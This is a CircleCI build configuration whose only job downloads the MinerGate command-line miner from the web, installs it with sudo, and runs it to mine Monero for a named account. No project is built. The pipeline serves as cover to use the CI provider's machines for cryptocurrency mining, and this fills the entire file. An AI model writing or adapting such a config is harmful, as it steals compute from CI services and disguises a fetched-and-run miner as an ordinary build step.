version: 2
jobs:
  build:
    machine: true
    steps:
      - checkout
      - run:
          command: |
            sudo apt update -yqq
            sudo apt install libxcb1 wget -yqq
            wget https://minergate.com/download/ubuntu-cli
            sudo dpkg -i ubuntu-cli
            minergate-cli --user yoginth@outlook.in --xmr 8
